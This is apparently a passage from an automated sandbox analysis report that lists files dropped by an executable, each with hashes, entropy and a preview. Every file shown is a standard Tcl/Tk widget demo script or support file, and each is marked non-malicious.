SHA1:	952CBB8C1AA3C13B3DCA7E09186A0F6491744811
SHA-256:	C10A183C31ACC75A3005C161F823BEE5D17ECEF3CFC024E0094B18D045658D09
SHA-512:	99D3811FEC94D4102A2E4C787E9730D3A82D7E4FC4EC6EC1E787816BDC1E20F20C68C8C0CCF4CA5A7F4D30D87B2D6E0FC847E0A051A130708455F43449153BF9
Malicious:	false
Preview:	::msgcat::mcset nl "Widget Demonstration" "Demonstratie van widgets".::msgcat::mcset nl "tkWidgetDemo" "tkWidgetDemo".::msgcat::mcset nl "&File" "&Bestand".::msgcat::mcset nl "About..." "Info...".::msgcat::mcset nl "&About..." "&Info...".::msgcat::mcset nl "<F1>" "<F1>".::msgcat::mcset nl "&Quit" "&Einde".::msgcat::mcset nl "Meta+Q" "Meta+E"..;# Displayed hotkey.::msgcat::mcset nl "Meta-q" "Meta-e"..;# Actual binding sequence.::msgcat::mcset nl "Ctrl+Q" "Ctrl+E"..;# Displayed hotkey.::msgcat::mcset nl "Control-q" "Control-e".;# Actual binding sequence.::msgcat::mcset nl "Dismiss" "Sluiten".::msgcat::mcset nl "See Variables" "Bekijk Variabelen".::msgcat::mcset nl "Variable Values" "Waarden Variabelen".::msgcat::mcset nl "OK" "OK".::msgcat::mcset nl "Run the \"%s\" sample program" "Start voorbeeld \"%s\"".::msgcat::mcset nl "Print Code" "Code Afdrukken".::msgcat::mcset nl "Demo code: %s" "Code van Demo %s".::msgcat::mcset nl "About Widget Demo" "Over d

C:\Users\user\Desktop\tk\demos\paned1.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1110
Entropy (8bit):	4.684442141887006
Encrypted:	false
SSDEEP:	24:K14I4EiWpWXeVXee1KUophzh49UjrDpT1pbLbkYfD0+q7l3l+vn:SZ4EfoXen87DrDpTDXDfqpUvn
MD5:	128EFF7686DAAE91811438F52B9D771B
SHA1:	6EC096A6475D9395358EB36A413CE871A384354B
SHA-256:	F1A09830739E04E18C62F14F065AE17DE6B678F11D980AA2E80D52FB67F24468
SHA-512:	6F09D706397DF4A77183BF1240A9BDAF8FA85E6B75BF7CE9D0858F6391AADEEC3B5F8F850B3C9D86213540753D4E8BFCA2565B2B2A98340CBB8B96DA6EE5B955
Malicious:	false
Preview:	# paned1.tcl --.#.# This demonstration script creates a toplevel window containing.# a paned window that separates two windows horizontally...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .paned1.catch {destroy $w}.toplevel $w.wm title $w "Horizontal Paned Window Demonstration".wm iconname $w "paned1".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "The sash between the two coloured windows below can be used to divide the area between them. Use the left mouse button to resize without redrawing by just moving the sash, and use the middle mouse button to resize opaquely (always redrawing the windows in each position.)".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..panedwindow $w.pane.pack $w.pane -side top -expand yes -fill both -pady 2 -padx 2m..label $w.pane.left -text "This is the\nleft side" -b

C:\Users\user\Desktop\tk\demos\paned2.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2229
Entropy (8bit):	4.684440292485292
Encrypted:	false
SSDEEP:	48:PZ4EOJXeS8imrDpT+hDDFupAvX4Cg10i+4IWUoDfv5L1r5HB:OONTfpTgupAvouWJ75h
MD5:	61C0A25E7A3A92FF9C3A8EB084480F91
SHA1:	6D65276F1ED0453D6BA4BDD2D015619814453EEF
SHA-256:	ECF37B73E63830D855EF46C721DB44C9ACBA39FA1D0F93A4FE9485656E1E5B51
SHA-512:	2CF0FEDDD36A466650A56131D73E22A06DB94E5684D7CC3928F59EAABDD340DCF49361FCA33CFA690A8A0D01B120A86FE2D5633551788A0B917880926A13F762
Malicious:	false
Preview:	# paned2.tcl --.#.# This demonstration script creates a toplevel window containing.# a paned window that separates two windows vertically...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .paned2.catch {destroy $w}.toplevel $w.wm title $w "Vertical Paned Window Demonstration".wm iconname $w "paned2".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "The sash between the two scrolled windows below can be used to divide the area between them. Use the left mouse button to resize without redrawing by just moving the sash, and use the middle mouse button to resize opaquely (always redrawing the windows in each position.)".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Create the pane itself.panedwindow $w.pane -orient vertical.pack $w.pane -side top -expand yes -fill both -pady 2 -padx 2m..# The top window

C:\Users\user\Desktop\tk\demos\pendulum.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7638
Entropy (8bit):	4.866970058639981
Encrypted:	false
SSDEEP:	192:uGObOUJP+WzUebrz+KrxdfqVe+mufHj8MZO5VHee589y5BDu:7iB3UebfLNqdC5CWBy
MD5:	8E40DDED849AACFC78036CCF52C7D558
SHA1:	FE2146201C839758ECB7D25B9577A3B526729F22
SHA-256:	2EA38024CC4557BCC29D7AB01CCF9A95B1F3F791CD71B91200EA7638E5A80927
SHA-512:	6DFBE0D7E321FD2B19A80D4C81928EC9BC9FF446EB228C52B2EA71FD463E7A9743F1D2A89A3F72752A9491BF1D4E0004F2ECBD9EF7D451B87CB8C762E8EEAAC9
Malicious:	false
Preview:	# pendulum.tcl --.#.# This demonstration illustrates how Tcl/Tk can be used to construct.# simulations of physical systems...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .pendulum.catch {destroy $w}.toplevel $w.wm title $w "Pendulum Animation Demonstration".wm iconname $w "pendulum".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration shows how Tcl/Tk can be used to carry out animations that are linked to simulations of physical systems. In the left canvas is a graphical representation of the physical system itself, a simple pendulum, and in the right canvas is a graph of the phase space of the system, which is a plot of the angle (relative to the vertical) against the angular velocity. The pendulum bob may be repositioned by clicking and dragging anywhere on the left canvas.".pack $w.msg..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pac

C:\Users\user\Desktop\tk\demos\plot.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2758
Entropy (8bit):	4.940417956363007
Encrypted:	false
SSDEEP:	48:EV4XeR8Us/ORTLV3J0cTlAeafAgrP8P7zHe/hzy6XJIgXZ:zOaUgkTB3FVbgrP8P7Lz+zZ
MD5:	39D4CB87D29372F354DF5F4A5B755489
SHA1:	815D295F6B7DEEE78515E3806EE54BCD8C6A2903
SHA-256:	49C76333F1322AE5D23ED9223FB4F89FF8A94D96BAFC661BA35D766DBA7578F8
SHA-512:	42D4947AA154AC1C3FC80A8C97A9C4D0C01191B17925355DA9C99B4FA7B5CF0CF1AB38937BFBE164FE77F0C798FDAD5FF96A1B30E1CDC71B459AB86BC3BFEEA0
Malicious:	false
Preview:	# plot.tcl --.#.# This demonstration script creates a canvas widget showing a 2-D.# plot with data points that can be dragged with the mouse...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .plot.catch {destroy $w}.toplevel $w.wm title $w "Plot Demonstration".wm iconname $w "Plot".positionWindow $w.set c $w.c..label $w.msg -font $font -wraplength 4i -justify left -text "This window displays a canvas widget containing a simple 2-dimensional plot. You can doctor the data by dragging any of the points with mouse button 1.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..canvas $c -relief raised -width 450 -height 300.pack $w.c -side top -fill x..set plotFont {Helvetica 18}..$c create line 100 250 400 250 -width 2.$c create line 100 250 100 50 -width 2.$c create text 225 20 -text "A Simple Plot" -font $plotFont -fill brown..for {set i

C:\Users\user\Desktop\tk\demos\puzzle.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2597
Entropy (8bit):	4.981005273323526
Encrypted:	false
SSDEEP:	48:PvXe4EoyDr8rEUu+r8oz+iMTNyV391gbUmOnVl0xdxbhQ/LBbqoHMrCnU:HOnDr8rLu+QfLTN8/gTvxdiBbYrCnU
MD5:	D29EA853076CAD07D16BFB03269D2EA4
SHA1:	0C5730DA10447E5B65F6663C28FC25027FA299CE
SHA-256:	0EA7791B87DD3E21F4F102CA8A7CEF98786263557F41B56AFCAFA09C9892CD4F
SHA-512:	5BA9BAB138400EB8B9A857D602EE84CEB16D884919A7D01E7AE9FCAF4B96EFD5FCA153BAB1C4616F16A1A2C26DB0C62D0FBA4483D2B23CFC9A662CE1C3C20989
Malicious:	false
Preview:	# puzzle.tcl --.#.# This demonstration script creates a 15-puzzle game using a collection.# of buttons...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# puzzleSwitch --.# This procedure is invoked when the user clicks on a particular button;.# if the button is next to the empty space, it moves the button into th.# empty space...proc puzzleSwitch {w num} {. global xpos ypos. if {(($ypos($num) >= ($ypos(space) - .01)).. && ($ypos($num) <= ($ypos(space) + .01)).. && ($xpos($num) >= ($xpos(space) - .26)).. && ($xpos($num) <= ($xpos(space) + .26))).. \|\| (($xpos($num) >= ($xpos(space) - .01)).. && ($xpos($num) <= ($xpos(space) + .01)).. && ($ypos($num) >= ($ypos(space) - .26)).. && ($ypos($num) <= ($ypos(space) + .26)))} {..set tmp $xpos(space)..set xpos(space) $xpos($num)..set xpos($num) $tmp..set tmp $ypos(space)..set ypos(space) $ypos($num)..set ypos($num) $tmp..place $w.frame.$num -relx $

C:\Users\user\Desktop\tk\demos\radio.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2752
Entropy (8bit):	4.780088069086321
Encrypted:	false
SSDEEP:	48:4ZuXe38AHLXY73LT3JqnGwWUv5sDXSBO7OgOZ9ifd3aD4tE1ve4/Zdkcyt+6OcN:ZOMAHQLdnY5sTAO7OgOZ1D4yv9PkcytN
MD5:	5FD9DC02303F0F41A5BEBA9D0F0C980E
SHA1:	BCA2189FAE230A84B88A5D16791ECFFAAA453276
SHA-256:	1ACEADAA575B06D7679862503DA6CFC38DDC771B2132CAECE3DD22B85C8B658C
SHA-512:	A9F8F631F96EEE55C51D6935558A8ABB537D6D2C82E3BBA46A45DCAFAAE4209BE40BD15072533FCFBC73ECCAE8CFD9D718A8EBAB50B00A3BB59C15C9E7BC12EA
Malicious:	false
Preview:	# radio.tcl --.#.# This demonstration script creates a toplevel window containing.# several radiobutton widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .radio.catch {destroy $w}.toplevel $w.wm title $w "Radiobutton Demonstration".wm iconname $w "radio".positionWindow $w.label $w.msg -font $font -wraplength 5i -justify left -text "Three groups of radiobuttons are displayed below. If you click on a button then the button will become selected exclusively among all the buttons in its group. A Tcl variable is associated with each group to indicate which of the group's buttons is selected. When the 'Tristate' button is pressed, the radio buttons will display the tri-state mode. Selecting any radio button will return the buttons to their respective on/off state. Click the \"See Variables\" button to see the current values of the variables.".grid $w.msg -row 0 -column 0 -columnspan 3 -sticky nsew..## See

C:\Users\user\Desktop\tk\demos\rmt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5340
Entropy (8bit):	4.697358306247198
Encrypted:	false
SSDEEP:	96:cec3+zd0A66cybXk07POdXOdndrvd7sdgdhd7d+oQqsQeoTHyfNRaiksRiIXaQ7L:3cOv7bzPOdXOdndTdgdgdhd7daqjeouD
MD5:	5780294D616808C8AE52926B9A14E34F
SHA1:	CEB09FEBA7FDFDB549F277342C3E3B47EC9B0301
SHA-256:	C3B94A57B4565A980FBB85669E74638687F12568531DA2FC6A00E51354D16469
SHA-512:	2688B97A9FACF8E8FE5001BD7E3F13D9E9DED66CB2DBCD73D6EB67656DE111CFE59ADC0E6069A6D8E911D018314BA19AF55D2A5671739EC53712D548948222A2
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# rmt --.# This script implements a simple remote-control mechanism for.# Tk applications. It allows you to select an application and.# then type commands to that application...package require Tcl 8.4.package require Tk..wm title . "Tk Remote Controller".wm iconname . "Tk Remote".wm minsize . 1 1..# The global variable below keeps track of the remote application.# that we're sending to. If it's an empty string then we execute.# the commands locally...set app "local"..# The global variable below keeps track of whether we're in the.# middle of executing a command entered via the text...set executing 0..# The global variable below keeps track of the last command executed,.# so it can be re-executed in response to !! commands...set lastCommand ""..# Create menu bar. Arrange to recreate all the information in the.# applications sub-menu whenever it is cascaded to.... configure -menu [menu .menu].menu .menu.file.men

C:\Users\user\Desktop\tk\demos\rolodex Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8297
Entropy (8bit):	4.8990639019479065
Encrypted:	false
SSDEEP:	192:W43Lk8ASWGL2IT7kbzbY++5Odr9zGVepS:JASWGL2ITotJGwM
MD5:	B59111E73A4FF4BDC12AC586C8116F4E
SHA1:	9903594BBA634FD1C75B9697AE46AD589F324622
SHA-256:	F62500D07A6FDAF903F0F8EF8901985FB45725B7DE522590DDCF6F1D15CA91AE
SHA-512:	DB8E212EBBB0F5A142186F09C0D78873666BC261BAE08D77720182DFD512D8AC4B0B12658DA2A7B166DA7F7C58349816315C12D4C76ADE6BB954F3FE5A6B7A24
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# rolodex --.# This script was written as an entry in Tom LaStrange's rolodex.# benchmark. It creates something that has some of the look and.# feel of a rolodex program, although it's lifeless and doesn't.# actually do the rolodex application...package require Tk..foreach i [winfo child .] {. catch {destroy $i}.}..set version 1.2..#------------------------------------------.# Phase 0: create the front end..#------------------------------------------..frame .frame -relief flat.pack .frame -side top -fill y -anchor center..set names {{} Name: Address: {} {} {Home Phone:} {Work Phone:} Fax:}.foreach i {1 2 3 4 5 6 7} {. label .frame.label$i -text [lindex $names $i] -anchor e. entry .frame.entry$i -width 35. grid .frame.label$i .frame.entry$i -sticky ew -pady 2 -padx 1.}..frame .buttons.pack .buttons -side bottom -pady 2 -anchor center.button .buttons.clear -text Clear.button .buttons.add -text Add.butt

C:\Users\user\Desktop\tk\demos\ruler.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5211
Entropy (8bit):	4.9199447680160375
Encrypted:	false
SSDEEP:	96:FhOYL6hMN5T2vuvFGvyRvpGvXtvJNvYcrmvqvmfbvavOfg7ptWS05teWtgOKx5oH:FhOY6hMHx5TqvqhfHfg7ptz05t7tgOKA
MD5:	8504D38BB9666173E1300F73A2B5B8E9
SHA1:	A53FE0F99AE91B3B88AB5976543F54F477F7439E
SHA-256:	62BEA92E5F1557F443953D971269D3A51DCBEE5E48D883098F40E6B5966C0E93
SHA-512:	A37AD6BE7425FA7F995D1639133814136BF7CE7A0B6014AC01D8223846FC0FD8FE472B6B4B799DFCCE91D83058CD487940022E92C04E54739BB0348844A37120
Malicious:	false
Preview:	# ruler.tcl --.#.# This demonstration script creates a canvas widget that displays a ruler.# with tab stops that can be set, moved, and deleted...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# rulerMkTab --.# This procedure creates a new triangular polygon in a canvas to.# represent a tab stop..#.# Arguments:.# c -..The canvas window..# x, y -.Coordinates at which to create the tab stop...proc rulerMkTab {c x y} {. upvar #0 demo_rulerInfo v. $c create polygon $x $y [expr {$x+$v(size)}] [expr {$y+$v(size)}] \.. [expr {$x-$v(size)}] [expr {$y+$v(size)}].}..set w .ruler.catch {destroy $w}.toplevel $w.wm title $w "Ruler Demonstration".wm iconname $w "ruler".positionWindow $w.set c $w.c..label $w.msg -font $font -wraplength 5i -justify left -text "This canvas widget shows a mock-up of a ruler. You can create tab stops by dragging them out of the well to the right of the ruler. You can also drag existing ta

C:\Users\user\Desktop\tk\demos\sayings.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2263
Entropy (8bit):	4.7312097722764035
Encrypted:	false
SSDEEP:	48:pLv9Xey82wpITUpFDvW/x8aB1f5vDm64pGR+el5SSn:POtTOTUTWui+elQw
MD5:	B8F15FDDDA30BFF147C32B2B8219680C
SHA1:	67CC17C27AA3A9780E6040118B05E2806FBC56A5
SHA-256:	5A1F3BE045D4A42D1985A2C886C981881CDB9F989CE890A4A80453F3F2FC0FB2
SHA-512:	0DF68D4E9B65D7967F538B67CE6F211867E20F017BBA4AFF31B3095115C6C26609EF02864CF5FFAD781053AC86F53522871D9D7ADC16B12AAFE911CCD684705B
Malicious:	false
Preview:	# sayings.tcl --.#.# This demonstration script creates a listbox that can be scrolled.# both horizontally and vertically. It displays a collection of.# well-known sayings...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .sayings.catch {destroy $w}.toplevel $w.wm title $w "Listbox Demonstration (well-known sayings)".wm iconname $w "sayings".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "The listbox below contains a collection of well-known sayings. You can scan the list using either of the scrollbars or by dragging in the listbox window with button 2 pressed.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame -borderwidth 10.pack $w.frame -side top -expand yes -fill both -padx 1c...scrollbar $w.frame.yscroll -command "$w.frame.list yview".scrollbar $w.frame.xscroll -orient horizontal \.

C:\Users\user\Desktop\tk\demos\search.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4398
Entropy (8bit):	4.78503304188963
Encrypted:	false
SSDEEP:	96:BOSxvcqBSVop5HTWW6dk6x3zqgben3FUCDx+TrdDGsYo8HluCVpzJlO9:BO7qPXiZdAHdWYd7G
MD5:	707F19984A2C4341654EAA84C86AA7CB
SHA1:	2A111DEDECFD512D062579348C402E534368A226
SHA-256:	04988F8941853AF02CDAF000AAC3EACE97944C1CAE67C7EBE0C84A9AE58F839B
SHA-512:	8A46771CB0978A61937471A23620177A2E63FAEB44A2672D1B0BB3F75190359EC50B13C1C9D51CF7C528B76D9D7ADD9F697B25B8A027A630348D7E46485BDDC5
Malicious:	false
Preview:	# search.tcl --.#.# This demonstration script creates a collection of widgets that.# allow you to load a file into a text widget, then perform searches.# on that file...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# textLoadFile --.# This procedure below loads a file into a text widget, discarding.# the previous contents of the widget. Tags for the old widget are.# not affected, however..#.# Arguments:.# w -..The window into which to load the file. Must be a.#..text widget..# file -.The name of the file to load. Must be readable...proc textLoadFile {w file} {. set f [open $file]. $w delete 1.0 end. while {![eof $f]} {..$w insert end [read $f 10000]. }. close $f.}..# textSearch --.# Search for all instances of a given string in a text widget and.# apply a given tag to each instance found..#.# Arguments:.# w -..The window in which to search. Must be a text widget..# string -.The string to search

C:\Users\user\Desktop\tk\demos\spin.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1820
Entropy (8bit):	4.788463672829234
Encrypted:	false
SSDEEP:	24:0U140xXeVXeH1KzhnAacsgIcSI3nqc5htDFT+H+6T1pLM7DRcj38VhxCemNxp:0UXxXeW86JNIcb5zoH9TDQM8VhMN7
MD5:	A35817B7A4CD5B231BE30030319D66B4
SHA1:	169768D76C8FBFF9E73D213EDB46BFEA9ADA91DF
SHA-256:	55D8B117627EE3CEE165E245A8F0229038C76F55646581D227FF7C22BEF3F3D4
SHA-512:	7C61DB5944AD312D5F6FB8E2F7E2CA0D2290351924FE1653E2BF4694F3AC9EF9B0F1C9237BBB12D1D61DD399AF32E3CB5DD981A227F46E4EFD3524CE7063BAE0
Malicious:	false
Preview:	# spin.tcl --.#.# This demonstration script creates several spinbox widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .spin.catch {destroy $w}.toplevel $w.wm title $w "Spinbox Demonstration".wm iconname $w "spin".positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "Three different\..spin-boxes are displayed below. You can add characters by pointing,\..clicking and typing. The normal Motif editing characters are\..supported, along with many Emacs bindings. For example, Backspace\..and Control-h delete the character to the left of the insertion\..cursor and Delete and Control-d delete the chararacter to the right\..of the insertion cursor. For values that are too large to fit in the\..window all at once, you can scan through the value by dragging with\..mouse button2 pressed. Note that the first spin-box will only permit\..you to type in integers, and the third selects fr

C:\Users\user\Desktop\tk\demos\square Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1315
Entropy (8bit):	4.824817771497911
Encrypted:	false
SSDEEP:	24:MlFIW4u9m3CzzGSdwDEDuUZMTqXDEr1d1ndhJdyZnOoDX1QQEeS6X87JCl3D/F8u:Mlg3k3iXUSSD+jzxUnJieXX8G3D/FdD
MD5:	3F172082D0AADC1B9B9509D1DF105B8D
SHA1:	FFE92D74C3CDDB8F18A30E82D65C40B2FDA08203
SHA-256:	F60FE3FC3AB19BBB3EFC776380BF38CD5495AEE55BE90A325D42DC385259E911
SHA-512:	00FFA4B5ADD2A540C3AD58B694E41CB188D57C4B75A14D8C75C3F6C61F1E2B0BD19B9501C9B623C0FDE7041AA4C2AB2EBA544509D7C7C0F9BE1207D3727D8401
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# square --.# This script generates a demo application containing only a "square".# widget. It's only usable in the "tktest" application or if Tk has.# been compiled with tkSquare.c. This demo arranges the following.# bindings for the widget:.# .# Button-1 press/drag:..moves square to mouse.# "a":....toggle size animation on/off..package require Tk..;# We use Tk generally, and....package require Tktest..;# ... we use the square widget too...square .s.pack .s -expand yes -fill both.wm minsize . 1 1..bind .s <1> {center %x %y}.bind .s <B1-Motion> {center %x %y}.bind .s a animate.focus .s..# The procedure below centers the square on a given position...proc center {x y} {. set a [.s size]. .s position [expr $x-($a/2)] [expr $y-($a/2)].}..# The procedures below provide a simple form of animation where.# the box changes size in a pulsing pattern: larger, smaller, larger,.# and so on...set inc 0.proc animate {} {

C:\Users\user\Desktop\tk\demos\states.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1667
Entropy (8bit):	4.7980948195677176
Encrypted:	false
SSDEEP:	48:tL+sPhuXew8Txt2ngCTUp8GlGpCoPQFjx0N2s:EOntt2npTUhGpDPh2s
MD5:	C969DED285E47F213DABB263BFF8DFA9
SHA1:	36C6FB6EE1917C194693364EF8F665F5E74E5CFD
SHA-256:	0693E90F310BEF6E7216141BEBB112B554DF2DD3F0B10444D61C62E948C49FB8
SHA-512:	2831AE10FDB8921FC89D442078929C4F3D50062966772DB53BDD518C3BBD3F706F8505C505F4C398CABF8348953634A62B402C1C1BD202C8F8325463565080C9
Malicious:	false
Preview:	# states.tcl --.#.# This demonstration script creates a listbox widget that displays.# the names of the 50 states in the United States of America...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .states.catch {destroy $w}.toplevel $w.wm title $w "Listbox Demonstration (50 states)".wm iconname $w "states".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "A listbox containing the 50 states is displayed below, along with a scrollbar. You can scan the list either using the scrollbar or by scanning. To scan, press button 2 in the widget and drag up or down.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame -borderwidth .5c.pack $w.frame -side top -expand yes -fill y..scrollbar $w.frame.scroll -command "$w.frame.list yview".listbox $w.frame.list -yscroll "$w.frame.scroll set" -setgrid 1 -heigh

C:\Users\user\Desktop\tk\demos\style.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6938
Entropy (8bit):	4.597691887277562
Encrypted:	false
SSDEEP:	192:xOqzKm64/ErQcHu9LTfprN6WGSopWjXF/Cz3WO8Iaz1/ar1npTWD/uxM6ytcwag6:x1b/fIx
MD5:	7303EB7FAB330A2B89F4291CCA7838D2
SHA1:	6753228A2A2F39D47CAB03E608964F879877D1FA
SHA-256:	DA10CDE4BB07D5FA280A822005B4D302B19F59FC74905E2D4892896C5A367B97
SHA-512:	08690EB72E9BD94935D9AD725DC340A86E63CE3ECB0DB3F8712DCC67A51A0B003D014B2E8409FE1035C4E587650E25766E69E0D9FA01FE06ED5A5BB7A527CDB6
Malicious:	false
Preview:	# style.tcl --.#.# This demonstration script creates a text widget that illustrates the.# various display styles that may be set for tags...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .style.catch {destroy $w}.toplevel $w.wm title $w "Text Demonstration - Display Styles".wm iconname $w "style".positionWindow $w..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Only set the font family in one place for simplicity and consistency..set family Courier..text $w.text -yscrollcommand "$w.scroll set" -setgrid true \..-width 70 -height 32 -wrap word -font "$family 12".scrollbar $w.scroll -command "$w.text yview".pack $w.scroll -side right -fill y.pack $w.text -expand yes -fill both..# Set up display styles..$w.text tag configure bold -font "$family 12 bold italic".$w.text tag configure big -font "$family 14 bold".$w.text tag configure verybig -font "Helvetica

C:\Users\user\Desktop\tk\demos\tclIndex Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4354
Entropy (8bit):	4.620878963393052
Encrypted:	false
SSDEEP:	96:e8atacjOtpHe20ZXS2kELcJ3zwpw/wow4gehbo4XBkbHI97N+rPDDvQE3ixT+dDw:edtZjOt9e20ZXS2kELcJDCiVvgehbo4h
MD5:	02039205602DC595C8157F4FB61077B1
SHA1:	B0ED4E39AC723E0A5932DF936D7A2C2904D057B2
SHA-256:	5FA8977E0C48ED1CBFED1870538BD8ADA5CC73FEE1EFF80280EEEE52F450F804
SHA-512:	D1B64043D280986992D0742425BF5454F7D639F8114B05C09176A1F23313469301188752CB1E71740126157C824FD03FEBF6F45DC28B95BFC0521A80AF9CA352
Malicious:	false
Preview:	# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(arrowSetup) [list source [file join $dir arrow.tcl]].set auto_index(arrowMove1) [list source [file join $dir arrow.tcl]].set auto_index(arrowMove2) [list source [file join $dir arrow.tcl]].set auto_index(arrowMove3) [list source [file join $dir arrow.tcl]].set auto_index(textLoadFile) [list source [file join $dir search.tcl]].set auto_index(textSearch) [list source [file join $dir search.tcl]].set auto_index(textToggle) [list source [file join $dir search.tcl]].set auto_index(itemEnter) [list source [file join $dir items.tcl]].set auto_index(itemLeave) [list source [file join $dir items.tcl]].set auto_index(itemMark) [list so

C:\Users\user\Desktop\tk\demos\tcolor Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11247
Entropy (8bit):	4.982910635328381
Encrypted:	false
SSDEEP:	192:DcI9Tiu4iEpDCC9IZJGGpiUHF1RU8fIY6ahdmkZo0gI6neQJ+gPNiAORVLd1ZaK2:DcI9TiurEpW/JGGl1RPmahdrZo0k+gAm
MD5:	97B924609DFB991A4B3140F5B412FE55
SHA1:	F37B753C3D0B1B9661AB79FC391DE10E0DAD3522
SHA-256:	AC9EF647E540271EEFDEF438792AC673E0470AE63A35B51B0FBC963D0737A4BA
SHA-512:	5CA46D5CDCD660B1CF16FE81B565A2BAAD6D63D8B31E3E6BB6A43CDE96F44E0AA273DCE3F746205BA4850A1550BD59C1337871CDEF1EA77CAF6B3EBBDFFA0034
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# tcolor --.# This script implements a simple color editor, where you can.# create colors using either the RGB, HSB, or CYM color spaces.# and apply the color to existing applications...package require Tk 8.4.wm title . "Color Editor"..# Global variables that control the program:.#.# colorSpace -...Color space currently being used for.#....editing. Must be "rgb", "cmy", or "hsb"..# label1, label2, label3 -.Labels for the scales..# red, green, blue -..Current color intensities in decimal.#....on a scale of 0-65535..# color -...A string giving the current color value.#....in the proper form for x:.#....#RRRRGGGGBBBB.# updating -...Non-zero means that we're in the middle of.#....updating the scales to load a new color,so.#....information shouldn't be propagating back.#....from the scales to other elements of the.#....program: this would make an infinite loop..# command -...Holds the command that has been typed.#..

C:\Users\user\Desktop\tk\demos\text.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3424
Entropy (8bit):	4.531841661280864
Encrypted:	false
SSDEEP:	96:hfkOSbCza+lTsH3SwkHcsLCITvnCotbyjPAOYxHt:hfkOS0a+lTsH3g8shbnCotbybE/
MD5:	04E71BDD979B1DD45AA6CB69D09662E1
SHA1:	358A5070A3D77F326F217C9404DF77B552F5268D
SHA-256:	618639286035B8A971CFF1A8DF4A54D279C903807F9B628F940EA73E40740815
